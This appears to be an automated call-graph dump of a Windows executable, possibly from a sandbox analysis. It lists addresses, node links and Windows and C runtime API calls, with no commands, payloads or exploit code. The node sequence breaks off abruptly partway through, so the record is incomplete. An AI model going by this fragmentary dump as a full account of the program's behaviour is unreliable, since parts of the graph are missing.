7ff633d61b35 16167->16169 16171 7ff633d74f08 _get_daylight 11 API calls 16168->16171 16170 7ff633d7039c _fread_nolock 53 API calls 16169->16170 16172 7ff633d61b4a 16170->16172 16173 7ff633d61b1b 16171->16173 16175 7ff633d61b6f 16172->16175 16176 7ff633d61b50 16172->16176 16174 7ff633d62910 54 API calls 16173->16174 16174->16183 17001 7ff633d70110 16175->17001 16177 7ff633d74f08 _get_daylight 11 API calls 16176->16177 16179 7ff633d61b55 16177->16179 16181 7ff633d62910 54 API calls 16179->16181 16181->16183 16182 7ff633d62710 54 API calls 16182->16183 16183->16143 16185 7ff633d6883a 16184->16185 16186 7ff633d69390 2 API calls 16185->16186 16187 7ff633d68859 GetEnvironmentVariableW 16186->16187 16188 7ff633d68876 ExpandEnvironmentStringsW 16187->16188 16189 7ff633d688c2 16187->16189 16188->16189 16190 7ff633d68898 16188->16190 16191 7ff633d6c550 _log10_special 8 API calls 16189->16191 16193 7ff633d69440 2 API calls 16190->16193 16192 7ff633d688d4 16191->16192 16192->15943 16194 7ff633d688aa 16193->16194 16195 7ff633d6c550 _log10_special 8 API calls 16194->16195 16196 7ff633d688ba 16195->16196 16196->15943 16198 7ff633d690f5 16197->16198 17219 7ff633d68570 GetCurrentProcess OpenProcessToken 16198->17219 16201 7ff633d68570 7 API calls 16202 7ff633d69121 16201->16202 16203 7ff633d6913a 16202->16203 16204 7ff633d69154 16202->16204 16205 7ff633d626b0 48 API calls 16203->16205 16206 7ff633d626b0 48 API calls 16204->16206 16207 7ff633d69152 16205->16207 16208 7ff633d69167 LocalFree LocalFree 16206->16208 16207->16208 16209 7ff633d69183 16208->16209 16212 7ff633d6918f 16208->16212 17229 7ff633d62b50 16209->17229 16211 7ff633d6c550 _log10_special 8 API calls 16213 7ff633d63c55 16211->16213 16212->16211 16213->15988 16214 7ff633d68660 16213->16214 16215 7ff633d68678 16214->16215 16216 7ff633d6869c 16215->16216 16217 7ff633d686fa GetTempPathW GetCurrentProcessId 16215->16217 16219 7ff633d68830 14 API calls 16216->16219 17238 7ff633d625c0 16217->17238 16220 7ff633d686a8 
16219->16220 17245 7ff633d681d0 16220->17245 16227 7ff633d68728 __std_exception_copy 16233 7ff633d68765 __std_exception_copy 16227->16233 17242 7ff633d78b68 16227->17242 16232 7ff633d6c550 _log10_special 8 API calls 16234 7ff633d63cbb 16232->16234 16238 7ff633d69390 2 API calls 16233->16238 16246 7ff633d687d4 __std_exception_copy 16233->16246 16234->15988 16234->16000 16239 7ff633d687b1 16238->16239 16240 7ff633d687e9 16239->16240 16241 7ff633d687b6 16239->16241 16243 7ff633d78238 38 API calls 16240->16243 16242 7ff633d69390 2 API calls 16241->16242 16243->16246 16246->16232 16248 7ff633d693b2 MultiByteToWideChar 16247->16248 16249 7ff633d693d6 16247->16249 16248->16249 16251 7ff633d693ec __std_exception_copy 16248->16251 16250 7ff633d693f3 MultiByteToWideChar 16249->16250 16249->16251 16250->16251 16251->15999 16264 7ff633d633ce memcpy_s 16252->16264 16253 7ff633d6c550 _log10_special 8 API calls 16254 7ff633d63664 16253->16254 16254->16057 16271 7ff633d690c0 LocalFree 16254->16271 16255 7ff633d635c7 16255->16253 16257 7ff633d61c80 49 API calls 16257->16264 16258 7ff633d635e2 16260 7ff633d62710 54 API calls 16258->16260 16260->16255 16263 7ff633d635c9 16266 7ff633d62710 54 API calls 16263->16266 16264->16255 16264->16257 16264->16258 16264->16263 16265 7ff633d62a50 54 API calls 16264->16265 16269 7ff633d635d0 16264->16269 17534 7ff633d64560 16264->17534 17540 7ff633d67e20 16264->17540 17552 7ff633d61600 16264->17552 17600 7ff633d67120 16264->17600 17604 7ff633d64190 16264->17604 17648 7ff633d64450 16264->17648 16265->16264 16266->16255 16270 7ff633d62710 54 API calls 16269->16270 16270->16255 16273 7ff633d61ca5 16272->16273 16274 7ff633d74984 49 API calls 16273->16274 16275 7ff633d61cc8 16274->16275 16275->15938 16277 7ff633d69390 2 API calls 16276->16277 16278 7ff633d689b4 16277->16278 16279 7ff633d78238 38 API calls 16278->16279 16280 7ff633d689c6 __std_exception_copy 16279->16280 16280->15951 16282 7ff633d645cc 16281->16282 16283 7ff633d69390 2 API calls 
16282->16283 16284 7ff633d645f4 16283->16284 16285 7ff633d69390 2 API calls 16284->16285 16286 7ff633d64607 16285->16286 17831 7ff633d75f94 16286->17831 16289 7ff633d6c550 _log10_special 8 API calls 16290 7ff633d6392b 16289->16290 16290->15941 16291 7ff633d67f90 16290->16291 16292 7ff633d67fb4 16291->16292 16293 7ff633d706d4 73 API calls 16292->16293 16298 7ff633d6808b __std_exception_copy 16292->16298 16294 7ff633d67fd0 16293->16294 16294->16298 18223 7ff633d778c8 16294->18223 16296 7ff633d706d4 73 API calls 16299 7ff633d67fe5 16296->16299 16297 7ff633d7039c _fread_nolock 53 API calls 16297->16299 16298->15945 16299->16296 16299->16297 16299->16298 16301 7ff633d7007c 16300->16301 18238 7ff633d6fe28 16301->18238 16303 7ff633d70095 16303->15941 16305 7ff633d6c850 16304->16305 16306 7ff633d62734 GetCurrentProcessId 16305->16306 16307 7ff633d61c80 49 API calls 16306->16307 16308 7ff633d62787 16307->16308 16309 7ff633d74984 49 API calls 16308->16309 16310 7ff633d627cf 16309->16310 16311 7ff633d62620 12 API calls 16310->16311 16312 7ff633d627f1 16311->16312 16313 7ff633d6c550 _log10_special 8 API calls 16312->16313 16314 7ff633d62801 16313->16314 16314->16057 16316 7ff633d69390 2 API calls 16315->16316 16317 7ff633d6895c 16316->16317 16318 7ff633d69390 2 API calls 16317->16318 16319 7ff633d6896c 16318->16319 16320 7ff633d78238 38 API calls 16319->16320 16321 7ff633d6897a __std_exception_copy 16320->16321 16321->15955 16325 7ff633d6c559 16322->16325 16323 7ff633d6c8e0 IsProcessorFeaturePresent 16326 7ff633d6c8f8 16323->16326 16324 7ff633d63ca7 16324->16063 16325->16323 16325->16324 18249 7ff633d6cad8 RtlCaptureContext 16326->18249 16332 7ff633d61c80 49 API calls 16331->16332 16333 7ff633d644fd 16332->16333 16333->15982 16335 7ff633d61c80 49 API calls 16334->16335 16336 7ff633d64660 16335->16336 16336->16000 16336->16336 16338 7ff633d66dd5 16337->16338 16339 7ff633d63e64 16338->16339 16340 7ff633d74f08 _get_daylight 11 API calls 16338->16340 16343 7ff633d67340 
16339->16343 16341 7ff633d66de2 16340->16341 16342 7ff633d62910 54 API calls 16341->16342 16342->16339 18254 7ff633d61470 16343->18254 16345 7ff633d67368 18360 7ff633d66360 16411->18360 16419 7ff633d63399 16420 7ff633d63670 16419->16420 16441 7ff633d7a55c 16424->16441 16428 7ff633d7a84f 16428->16111 16540 7ff633d7546c EnterCriticalSection 16434->16540 16442 7ff633d7a578 GetLastError 16441->16442 16443 7ff633d7a5b3 16441->16443 16444 7ff633d7a588 16442->16444 16443->16428 16447 7ff633d7a5c8 16443->16447 16454 7ff633d7b390 16444->16454 16448 7ff633d7a5fc 16447->16448 16449 7ff633d7a5e4 GetLastError SetLastError 16447->16449 16448->16428 16450 7ff633d7a900 IsProcessorFeaturePresent 16448->16450 16449->16448 16451 7ff633d7a913 16450->16451 16532 7ff633d7a614 16451->16532 16455 7ff633d7b3ca FlsSetValue 16454->16455 16456 7ff633d7b3af FlsGetValue 16454->16456 16457 7ff633d7b3d7 16455->16457 16460 7ff633d7a5a3 SetLastError 16455->16460 16458 7ff633d7b3c4 16456->16458 16456->16460 16471 7ff633d7eb98 16457->16471 16458->16455 16460->16443 16462 7ff633d7b404 FlsSetValue 16465 7ff633d7b422 16462->16465 16466 7ff633d7b410 FlsSetValue 16462->16466 16463 7ff633d7b3f4 FlsSetValue 16464 7ff633d7b3fd 16463->16464 16478 7ff633d7a948 16464->16478 16484 7ff633d7aef4 16465->16484 16466->16464 16477 7ff633d7eba9 _get_daylight 16471->16477 16472 7ff633d7ebfa 16492 7ff633d74f08 16472->16492 16473 7ff633d7ebde HeapAlloc 16475 7ff633d7b3e6 16473->16475 16473->16477 16475->16462 16475->16463 16477->16472 16477->16473 16489 7ff633d83590 16477->16489 16479 7ff633d7a94d RtlFreeHeap 16478->16479 16481 7ff633d7a97c 16478->16481 16480 7ff633d7a968 GetLastError 16479->16480 16479->16481 16482 7ff633d7a975 Concurrency::details::SchedulerProxy::DeleteThis 16480->16482 16481->16460 16483 7ff633d74f08 _get_daylight 9 API calls 16482->16483 16483->16481 16518 7ff633d7adcc 16484->16518 16495 7ff633d835d0 16489->16495 16501 7ff633d7b2c8 GetLastError 16492->16501 16494 7ff633d74f11 16494->16475 16500 
7ff633d802d8 EnterCriticalSection 16495->16500 16502 7ff633d7b2ec 16501->16502 16503 7ff633d7b309 FlsSetValue 16501->16503 16502->16503 16516 7ff633d7b2f9 16502->16516 16504 7ff633d7b31b 16503->16504 16503->16516 16506 7ff633d7eb98 _get_daylight 5 API calls 16504->16506 16505 7ff633d7b375 SetLastError 16505->16494 16507 7ff633d7b32a 16506->16507 16508 7ff633d7b348 FlsSetValue 16507->16508 16509 7ff633d7b338 FlsSetValue 16507->16509 16511 7ff633d7b366 16508->16511 16512 7ff633d7b354 FlsSetValue 16508->16512 16510 7ff633d7b341 16509->16510 16514 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16510->16514 16513 7ff633d7aef4 _get_daylight 5 API calls 16511->16513 16512->16510 16515 7ff633d7b36e 16513->16515 16514->16516 16517 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16515->16517 16516->16505 16517->16505 16530 7ff633d802d8 EnterCriticalSection 16518->16530 16533 7ff633d7a64e __GetCurrentState memcpy_s 16532->16533 16534 7ff633d7a676 RtlCaptureContext RtlLookupFunctionEntry 16533->16534 16535 7ff633d7a6e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16534->16535 16536 7ff633d7a6b0 RtlVirtualUnwind 16534->16536 16538 7ff633d7a738 __GetCurrentState 16535->16538 16536->16535 16537 7ff633d6c550 _log10_special 8 API calls 16539 7ff633d7a757 GetCurrentProcess TerminateProcess 16537->16539 16538->16537 16542 7ff633d636bc GetModuleFileNameW 16541->16542 16542->16115 16542->16116 16544 7ff633d692bf FindClose 16543->16544 16545 7ff633d692d2 16543->16545 16544->16545 16546 7ff633d6c550 _log10_special 8 API calls 16545->16546 16547 7ff633d6371a 16546->16547 16547->16121 16547->16122 16549 7ff633d6c850 16548->16549 16550 7ff633d62c70 GetCurrentProcessId 16549->16550 16579 7ff633d626b0 16550->16579 16552 7ff633d62cb9 16583 7ff633d74bd8 16552->16583 16555 7ff633d626b0 48 API calls 16556 7ff633d62d34 FormatMessageW 16555->16556 16558 7ff633d62d6d 16556->16558 16559 7ff633d62d7f MessageBoxW 
16556->16559 16560 7ff633d626b0 48 API calls 16558->16560 16561 7ff633d6c550 _log10_special 8 API calls 16559->16561 16560->16559 16562 7ff633d62daf 16561->16562 16562->16119 16564 7ff633d63730 16563->16564 16565 7ff633d69340 GetFinalPathNameByHandleW CloseHandle 16563->16565 16564->16129 16564->16130 16565->16564 16567 7ff633d62834 16566->16567 16568 7ff633d626b0 48 API calls 16567->16568 16569 7ff633d62887 16568->16569 16570 7ff633d74bd8 48 API calls 16569->16570 16571 7ff633d628d0 MessageBoxW 16570->16571 16572 7ff633d6c550 _log10_special 8 API calls 16571->16572 16573 7ff633d62900 16572->16573 16573->16119 16575 7ff633d6946a WideCharToMultiByte 16574->16575 16576 7ff633d69495 16574->16576 16575->16576 16578 7ff633d694ab __std_exception_copy 16575->16578 16577 7ff633d694b2 WideCharToMultiByte 16576->16577 16576->16578 16577->16578 16578->16126 16580 7ff633d626d5 16579->16580 16581 7ff633d74bd8 48 API calls 16580->16581 16582 7ff633d626f8 16581->16582 16582->16552 16587 7ff633d74c32 16583->16587 16584 7ff633d74c57 16585 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16584->16585 16589 7ff633d74c81 16585->16589 16586 7ff633d74c93 16601 7ff633d72f90 16586->16601 16587->16584 16587->16586 16591 7ff633d6c550 _log10_special 8 API calls 16589->16591 16593 7ff633d62d04 16591->16593 16592 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16592->16589 16593->16555 16594 7ff633d74d9a 16596 7ff633d74d74 16594->16596 16598 7ff633d74da4 16594->16598 16595 7ff633d74d49 16599 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16595->16599 16596->16592 16597 7ff633d74d40 16597->16595 16597->16596 16600 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16598->16600 16599->16589 16600->16589 16602 7ff633d72fce 16601->16602 16603 7ff633d72fbe 16601->16603 16604 7ff633d72fd7 16602->16604 16609 7ff633d73005 16602->16609 16605 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16603->16605 16606 
7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16604->16606 16607 7ff633d72ffd 16605->16607 16606->16607 16607->16594 16607->16595 16607->16596 16607->16597 16609->16603 16609->16607 16612 7ff633d739a4 16609->16612 16645 7ff633d733f0 16609->16645 16682 7ff633d72b80 16609->16682 16613 7ff633d739e6 16612->16613 16614 7ff633d73a57 16612->16614 16615 7ff633d739ec 16613->16615 16616 7ff633d73a81 16613->16616 16617 7ff633d73a5c 16614->16617 16618 7ff633d73ab0 16614->16618 16619 7ff633d73a20 16615->16619 16620 7ff633d739f1 16615->16620 16705 7ff633d71d54 16616->16705 16621 7ff633d73a91 16617->16621 16622 7ff633d73a5e 16617->16622 16624 7ff633d73ac7 16618->16624 16626 7ff633d73aba 16618->16626 16631 7ff633d73abf 16618->16631 16627 7ff633d739f7 16619->16627 16619->16631 16620->16624 16620->16627 16712 7ff633d71944 16621->16712 16625 7ff633d73a00 16622->16625 16634 7ff633d73a6d 16622->16634 16719 7ff633d746ac 16624->16719 16644 7ff633d73af0 16625->16644 16685 7ff633d74158 16625->16685 16626->16616 16626->16631 16627->16625 16632 7ff633d73a32 16627->16632 16641 7ff633d73a1b 16627->16641 16631->16644 16723 7ff633d72164 16631->16723 16632->16644 16695 7ff633d74494 16632->16695 16634->16616 16636 7ff633d73a72 16634->16636 16636->16644 16701 7ff633d74558 16636->16701 16637 7ff633d6c550 _log10_special 8 API calls 16639 7ff633d73dea 16637->16639 16639->16609 16643 7ff633d73cdc 16641->16643 16641->16644 16730 7ff633d747c0 16641->16730 16643->16644 16736 7ff633d7ea08 16643->16736 16644->16637 16646 7ff633d73414 16645->16646 16647 7ff633d733fe 16645->16647 16650 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16646->16650 16651 7ff633d73454 16646->16651 16648 7ff633d739e6 16647->16648 16649 7ff633d73a57 16647->16649 16647->16651 16652 7ff633d739ec 16648->16652 16653 7ff633d73a81 16648->16653 16654 7ff633d73a5c 16649->16654 16655 7ff633d73ab0 16649->16655 16650->16651 16651->16609 16656 7ff633d73a20 16652->16656 16657 7ff633d739f1 16652->16657 16660 7ff633d71d54 38 API calls 
16653->16660 16658 7ff633d73a91 16654->16658 16659 7ff633d73a5e 16654->16659 16661 7ff633d73ac7 16655->16661 16663 7ff633d73aba 16655->16663 16667 7ff633d73abf 16655->16667 16664 7ff633d739f7 16656->16664 16656->16667 16657->16661 16657->16664 16665 7ff633d71944 38 API calls 16658->16665 16662 7ff633d73a00 16659->16662 16671 7ff633d73a6d 16659->16671 16678 7ff633d73a1b 16660->16678 16668 7ff633d746ac 45 API calls 16661->16668 16666 7ff633d74158 47 API calls 16662->16666 16681 7ff633d73af0 16662->16681 16663->16653 16663->16667 16664->16662 16669 7ff633d73a32 16664->16669 16664->16678 16665->16678 16666->16678 16670 7ff633d72164 38 API calls 16667->16670 16667->16681 16668->16678 16672 7ff633d74494 46 API calls 16669->16672 16669->16681 16670->16678 16671->16653 16673 7ff633d73a72 16671->16673 16672->16678 16675 7ff633d74558 37 API calls 16673->16675 16673->16681 16674 7ff633d6c550 _log10_special 8 API calls 16676 7ff633d73dea 16674->16676 16675->16678 16676->16609 16677 7ff633d747c0 45 API calls 16680 7ff633d73cdc 16677->16680 16678->16677 16678->16680 16678->16681 16679 7ff633d7ea08 46 API calls 16679->16680 16680->16679 16680->16681 16681->16674 16962 7ff633d70fc8 16682->16962 16686 7ff633d7417e 16685->16686 16748 7ff633d70b80 16686->16748 16691 7ff633d747c0 45 API calls 16693 7ff633d742c3 16691->16693 16692 7ff633d74351 16692->16641 16693->16692 16694 7ff633d747c0 45 API calls 16693->16694 16694->16692 16696 7ff633d744c9 16695->16696 16697 7ff633d744e7 16696->16697 16698 7ff633d747c0 45 API calls 16696->16698 16700 7ff633d7450e 16696->16700 16699 7ff633d7ea08 46 API calls 16697->16699 16698->16697 16699->16700 16700->16641 16702 7ff633d74579 16701->16702 16703 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16702->16703 16704 7ff633d745aa 16702->16704 16703->16704 16704->16641 16706 7ff633d71d87 16705->16706 16707 7ff633d71db6 16706->16707 16709 7ff633d71e73 16706->16709 16711 7ff633d71df3 16707->16711 16894 7ff633d70c28 16707->16894 16710 7ff633d7a814 
_invalid_parameter_noinfo 37 API calls 16709->16710 16710->16711 16711->16641 16713 7ff633d71977 16712->16713 16714 7ff633d719a6 16713->16714 16716 7ff633d71a63 16713->16716 16715 7ff633d70c28 12 API calls 16714->16715 16718 7ff633d719e3 16714->16718 16715->16718 16717 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16716->16717 16717->16718 16718->16641 16720 7ff633d746ef 16719->16720 16722 7ff633d746f3 __crtLCMapStringW 16720->16722 16902 7ff633d74748 16720->16902 16722->16641 16724 7ff633d72197 16723->16724 16725 7ff633d721c6 16724->16725 16727 7ff633d72283 16724->16727 16726 7ff633d70c28 12 API calls 16725->16726 16729 7ff633d72203 16725->16729 16726->16729 16728 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16727->16728 16728->16729 16729->16641 16731 7ff633d747d7 16730->16731 16906 7ff633d7d9b8 16731->16906 16738 7ff633d7ea39 16736->16738 16744 7ff633d7ea47 16736->16744 16737 7ff633d7ea67 16740 7ff633d7ea78 16737->16740 16741 7ff633d7ea9f 16737->16741 16738->16737 16739 7ff633d747c0 45 API calls 16738->16739 16738->16744 16739->16737 16952 7ff633d800a0 16740->16952 16743 7ff633d7eb2a 16741->16743 16741->16744 16746 7ff633d7eac9 16741->16746 16745 7ff633d7f8a0 _fread_nolock MultiByteToWideChar 16743->16745 16744->16643 16745->16744 16746->16744 16955 7ff633d7f8a0 16746->16955 16749 7ff633d70bb7 16748->16749 16755 7ff633d70ba6 16748->16755 16749->16755 16778 7ff633d7d5fc 16749->16778 16752 7ff633d70bf8 16754 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16752->16754 16753 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16753->16752 16754->16755 16756 7ff633d7e570 16755->16756 16757 7ff633d7e5c0 16756->16757 16758 7ff633d7e58d 16756->16758 16757->16758 16760 7ff633d7e5f2 16757->16760 16759 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16758->16759 16768 7ff633d742a1 16759->16768 16766 7ff633d7e705 16760->16766 16773 7ff633d7e63a 16760->16773 16761 7ff633d7e7f7 16818 7ff633d7da5c 16761->16818 
16763 7ff633d7e7bd 16811 7ff633d7ddf4 16763->16811 16765 7ff633d7e78c 16804 7ff633d7e0d4 16765->16804 16766->16761 16766->16763 16766->16765 16767 7ff633d7e74f 16766->16767 16770 7ff633d7e745 16766->16770 16794 7ff633d7e304 16767->16794 16768->16691 16768->16693 16770->16763 16772 7ff633d7e74a 16770->16772 16772->16765 16772->16767 16773->16768 16785 7ff633d7a4a4 16773->16785 16776 7ff633d7a900 _isindst 17 API calls 16777 7ff633d7e854 16776->16777 16779 7ff633d7d60b _get_daylight 16778->16779 16780 7ff633d7d647 16778->16780 16779->16780 16782 7ff633d7d62e HeapAlloc 16779->16782 16784 7ff633d83590 _get_daylight 2 API calls 16779->16784 16781 7ff633d74f08 _get_daylight 11 API calls 16780->16781 16783 7ff633d70be4 16781->16783 16782->16779 16782->16783 16783->16752 16783->16753 16784->16779 16786 7ff633d7a4bb 16785->16786 16787 7ff633d7a4b1 16785->16787 16788 7ff633d74f08 _get_daylight 11 API calls 16786->16788 16787->16786 16790 7ff633d7a4d6 16787->16790 16793 7ff633d7a4c2 16788->16793 16791 7ff633d7a4ce 16790->16791 16792 7ff633d74f08 _get_daylight 11 API calls 16790->16792 16791->16768 16791->16776 16792->16793 16827 7ff633d7a8e0 16793->16827 16830 7ff633d840ac 16794->16830 16798 7ff633d7e3ac 16799 7ff633d7e401 16798->16799 16800 7ff633d7e3cc 16798->16800 16803 7ff633d7e3b0 16798->16803 16883 7ff633d7def0 16799->16883 16879 7ff633d7e1ac 16800->16879 16803->16768 16805 7ff633d840ac 38 API calls 16804->16805 16806 7ff633d7e11e 16805->16806 16807 7ff633d83af4 37 API calls 16806->16807 16808 7ff633d7e16e 16807->16808 16809 7ff633d7e172 16808->16809 16810 7ff633d7e1ac 45 API calls 16808->16810 16809->16768 16810->16809 16812 7ff633d840ac 38 API calls 16811->16812 16813 7ff633d7de3f 16812->16813 16814 7ff633d83af4 37 API calls 16813->16814 16815 7ff633d7de97 16814->16815 16816 7ff633d7de9b 16815->16816 16817 7ff633d7def0 45 API calls 16815->16817 16816->16768 16817->16816 16819 7ff633d7dad4 16818->16819 16820 7ff633d7daa1 16818->16820 16821 7ff633d7daec 16819->16821 
16825 7ff633d7db6d 16819->16825 16822 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16820->16822 16823 7ff633d7ddf4 46 API calls 16821->16823 16824 7ff633d7dacd memcpy_s 16822->16824 16823->16824 16824->16768 16825->16824 16826 7ff633d747c0 45 API calls 16825->16826 16826->16824 16828 7ff633d7a778 _invalid_parameter_noinfo 37 API calls 16827->16828 16829 7ff633d7a8f9 16828->16829 16829->16791 16831 7ff633d840ff fegetenv 16830->16831 16832 7ff633d87e2c 37 API calls 16831->16832 16835 7ff633d84152 16832->16835 16833 7ff633d8417f 16837 7ff633d7a4a4 __std_exception_copy 37 API calls 16833->16837 16834 7ff633d84242 16836 7ff633d87e2c 37 API calls 16834->16836 16835->16834 16840 7ff633d8421c 16835->16840 16841 7ff633d8416d 16835->16841 16838 7ff633d8426c 16836->16838 16839 7ff633d841fd 16837->16839 16842 7ff633d87e2c 37 API calls 16838->16842 16843 7ff633d85324 16839->16843 16849 7ff633d84205 16839->16849 16844 7ff633d7a4a4 __std_exception_copy 37 API calls 16840->16844 16841->16833 16841->16834 16845 7ff633d8427d 16842->16845 16846 7ff633d7a900 _isindst 17 API calls 16843->16846 16844->16839 16847 7ff633d88020 20 API calls 16845->16847 16848 7ff633d85339 16846->16848 16852 7ff633d842e6 memcpy_s 16847->16852 16850 7ff633d6c550 _log10_special 8 API calls 16849->16850 16851 7ff633d7e351 16850->16851 16875 7ff633d83af4 16851->16875 16853 7ff633d8468f memcpy_s 16852->16853 16855 7ff633d84327 memcpy_s 16852->16855 16859 7ff633d74f08 _get_daylight 11 API calls 16852->16859 16854 7ff633d849cf 16856 7ff633d83c10 37 API calls 16854->16856 16870 7ff633d84c6b memcpy_s 16855->16870 16871 7ff633d84783 memcpy_s 16855->16871 16861 7ff633d850e7 16856->16861 16857 7ff633d8497b 16857->16854 16858 7ff633d8533c memcpy_s 37 API calls 16857->16858 16858->16854 16860 7ff633d84760 16859->16860 16862 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 16860->16862 16863 7ff633d8533c memcpy_s 37 API calls 16861->16863 16874 7ff633d85142 16861->16874 16862->16855 16863->16874 16864 
19556->19560 19562 7ff633d87a40 19556->19562 19557 7ff633d879d1 19557->19549 19559 7ff633d7f0e4 __crtLCMapStringW 6 API calls 19557->19559 19558->19562 19559->19549 19560->19549 19561 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19560->19561 19561->19549 19562->19549 19563 7ff633d7f0e4 __crtLCMapStringW 6 API calls 19562->19563 19564 7ff633d87ac0 19563->19564 19564->19560 19565 7ff633d87af6 19564->19565 19566 7ff633d87ae0 19564->19566 19568 7ff633d807e8 WideCharToMultiByte 19565->19568 19567 7ff633d807e8 WideCharToMultiByte 19566->19567 19569 7ff633d87aee 19567->19569 19568->19569 19569->19560 19570 7ff633d87b0e 19569->19570 19570->19549 19571 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19570->19571 19571->19549 19573 7ff633d7ed10 __crtLCMapStringW 5 API calls 19572->19573 19574 7ff633d7f122 19573->19574 19575 7ff633d7f12a 19574->19575 19578 7ff633d7f1d0 19574->19578 19575->19549 19575->19556 19575->19557 19577 7ff633d7f193 LCMapStringW 19577->19575 19579 7ff633d7ed10 __crtLCMapStringW 5 API calls 19578->19579 19580 7ff633d7f1fe __crtLCMapStringW 19579->19580 19580->19577 19584 7ff633d794ad 19582->19584 19587 7ff633d79349 19582->19587 19583 7ff633d794d6 19586 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19583->19586 19584->19583 19585 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19584->19585 19585->19584 19586->19587 19587->19429 19589 7ff633d862d8 19588->19589 19590 7ff633d862c1 19588->19590 19589->19590 19593 7ff633d862e6 19589->19593 19591 7ff633d74f08 _get_daylight 11 API calls 19590->19591 19592 7ff633d862c6 19591->19592 19594 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 19592->19594 19595 7ff633d74f4c 45 API calls 19593->19595 19596 7ff633d862d1 19593->19596 19594->19596 19595->19596 19596->19291 19598 7ff633d74f4c 45 API calls 19597->19598 19599 7ff633d88f71 19598->19599 19602 7ff633d88bc8 19599->19602 19605 7ff633d88c16 
19602->19605 19603 7ff633d6c550 _log10_special 8 API calls 19604 7ff633d87205 19603->19604 19604->19290 19604->19291 19606 7ff633d88c9d 19605->19606 19608 7ff633d88c88 GetCPInfo 19605->19608 19611 7ff633d88ca1 19605->19611 19607 7ff633d7f8a0 _fread_nolock MultiByteToWideChar 19606->19607 19606->19611 19609 7ff633d88d35 19607->19609 19608->19606 19608->19611 19610 7ff633d7d5fc _fread_nolock 12 API calls 19609->19610 19609->19611 19612 7ff633d88d6c 19609->19612 19610->19612 19611->19603 19612->19611 19613 7ff633d7f8a0 _fread_nolock MultiByteToWideChar 19612->19613 19614 7ff633d88dda 19613->19614 19615 7ff633d7f8a0 _fread_nolock MultiByteToWideChar 19614->19615 19616 7ff633d88ebc 19614->19616 19618 7ff633d88e00 19615->19618 19616->19611 19617 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19616->19617 19617->19611 19618->19616 19619 7ff633d7d5fc _fread_nolock 12 API calls 19618->19619 19620 7ff633d88e2d 19618->19620 19619->19620 19620->19616 19621 7ff633d7f8a0 _fread_nolock MultiByteToWideChar 19620->19621 19622 7ff633d88ea4 19621->19622 19623 7ff633d88ec4 19622->19623 19624 7ff633d88eaa 19622->19624 19631 7ff633d7ef68 19623->19631 19624->19616 19627 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19624->19627 19627->19616 19628 7ff633d88f03 19628->19611 19630 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19628->19630 19629 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19629->19628 19630->19611 19632 7ff633d7ed10 __crtLCMapStringW 5 API calls 19631->19632 19633 7ff633d7efa6 19632->19633 19634 7ff633d7efae 19633->19634 19635 7ff633d7f1d0 __crtLCMapStringW 5 API calls 19633->19635 19634->19628 19634->19629 19636 7ff633d7f017 CompareStringW 19635->19636 19636->19634 19638 7ff633d87c5a HeapSize 19637->19638 19639 7ff633d87c41 19637->19639 19640 7ff633d74f08 _get_daylight 11 API calls 19639->19640 19641 7ff633d87c46 19640->19641 19642 7ff633d7a8e0 
_invalid_parameter_noinfo 37 API calls 19641->19642 19643 7ff633d87c51 19642->19643 19643->19295 19645 7ff633d87c89 19644->19645 19646 7ff633d87c93 19644->19646 19648 7ff633d7d5fc _fread_nolock 12 API calls 19645->19648 19647 7ff633d87c98 19646->19647 19654 7ff633d87c9f _get_daylight 19646->19654 19649 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19647->19649 19652 7ff633d87c91 19648->19652 19649->19652 19650 7ff633d87ca5 19653 7ff633d74f08 _get_daylight 11 API calls 19650->19653 19651 7ff633d87cd2 HeapReAlloc 19651->19652 19651->19654 19652->19300 19653->19652 19654->19650 19654->19651 19655 7ff633d83590 _get_daylight 2 API calls 19654->19655 19655->19654 19657 7ff633d7ed10 __crtLCMapStringW 5 API calls 19656->19657 19658 7ff633d7ef44 19657->19658 19658->19304 19660 7ff633d754fa 19659->19660 19661 7ff633d754d6 19659->19661 19662 7ff633d75554 19660->19662 19663 7ff633d754ff 19660->19663 19665 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19661->19665 19666 7ff633d754e5 19661->19666 19664 7ff633d7f8a0 _fread_nolock MultiByteToWideChar 19662->19664 19663->19666 19668 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19663->19668 19673 7ff633d75514 19663->19673 19671 7ff633d75570 19664->19671 19665->19666 19666->19308 19666->19309 19667 7ff633d75577 GetLastError 19670 7ff633d74e7c _fread_nolock 11 API calls 19667->19670 19668->19673 19669 7ff633d7d5fc _fread_nolock 12 API calls 19669->19666 19675 7ff633d75584 19670->19675 19671->19667 19672 7ff633d755b2 19671->19672 19676 7ff633d755a5 19671->19676 19679 7ff633d7a948 